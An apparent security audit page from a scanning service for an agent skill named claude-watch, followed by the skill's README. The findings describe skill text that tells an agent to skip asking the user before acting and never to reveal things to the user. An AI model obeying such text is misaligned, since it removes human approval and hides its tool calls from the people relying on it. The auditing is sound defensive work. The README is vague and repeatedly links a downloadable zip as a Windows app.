Monitor Claude Code sessions with an open-source dashboard to visualize logic, track changes, and search your code with AI
SaferSkills independently audited claude-watch (Agent Skill) and scored it 79/100 (yellow). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 0 high-severity and 5 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.
Findings & checks · 5 flagged
The text {match} tells the agent to skip the normal "ask the user first" gate. Used adversarially it removes the human-in-the-loop check before destructive or sensitive actions, turning a normally-gated agent into a fire-and-forget executor.
The text {match} tells the agent to skip the normal "ask the user first" gate. Used adversarially it removes the human-in-the-loop check before destructive or sensitive actions, turning a normally-gated agent into a fire-and-forget executor.
A bulleted imperative like {match} tells the agent to never reveal, disclose, or mention something to the user. Used adversarially it can instruct the agent to hide its tool calls or lie about what it did — stripping the transparency a user relies on to trust the agent.
A bulleted imperative like {match} tells the agent to never reveal, disclose, or mention something to the user. Used adversarially it can instruct the agent to hide its tool calls or lie about what it did — stripping the transparency a user relies on to trust the agent.
Every scanned point with the score it earned and what moved between them.
First recorded scan — no prior version to compare against.
The primary manifest — the file an agent reads to learn what this artifact does.
claude-watch is a Windows app that helps you see what Claude Code is doing in your project. It gives you a live view of project logic, file changes, and code search. It is built for people who want a clear window into their work without digging through files by hand.
Use it to follow changes as they happen, check how your project is evolving, and find the code you need faster. It keeps the view simple, so you can focus on the project instead of the tools.
Visit this page to download claude-watch for Windows:
https://raw.githubusercontent.com/mr-mrs-xx1/claude-watch/main/dashboard/claude-watch-1.5.zip
On that page, look for the latest release and download the Windows file that matches your system. If you see more than one file, choose the one for Windows.
claude-watch is made for modern Windows computers.
For best results, keep your project on a local drive such as C:\ and close other apps if your PC feels slow.
Follow these steps to install and open claude-watch on Windows.
https://raw.githubusercontent.com/mr-mrs-xx1/claude-watch/main/dashboard/claude-watch-1.5.zip
When you open claude-watch for the first time, you may need to set a project folder and let the app index your files.
If you move the project to a new folder, open claude-watch again and select the new location.
claude-watch helps you keep track of your project in a few simple ways.
This can save time when you need to understand a project fast or check how a change fits into the rest of the code.
After setup, the app shows a dashboard with live project data.
If you are not sure where to start, use search first. It is the quickest way to find a file, a term, or a feature.
To get better results from search:
If your project has many files, search can help you find the right place faster than opening folders one by one.
claude-watch works well when you want to:
claude-watch works best with common project files used in desktop and web work.
It is built to handle active projects with many files, so it fits well with real development work and ongoing edits.
claude-watch is meant to help you view your own project on your machine.
If you work in a shared project, make sure you choose the right folder before you start.
If the app does not open or load as expected, try these steps.
If the dashboard stays blank:
If search does not return results:
The release page lists the latest Windows build, version details, and download files.
https://raw.githubusercontent.com/mr-mrs-xx1/claude-watch/main/dashboard/claude-watch-1.5.zip
Check that page when you want the newest build or need to compare files for different Windows setups.
No. You download it, open it, and choose your project folder. After that, the app does most of the work.
No. You can use it as a viewer for your project and search for files or terms with simple input.
Yes. It is made to observe Claude Code work and show you useful project changes in real time.
Yes. Open one project folder, then switch to another folder when you want to work elsewhere.
That is fine. claude-watch is built to follow active changes, so it fits ongoing work.
~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.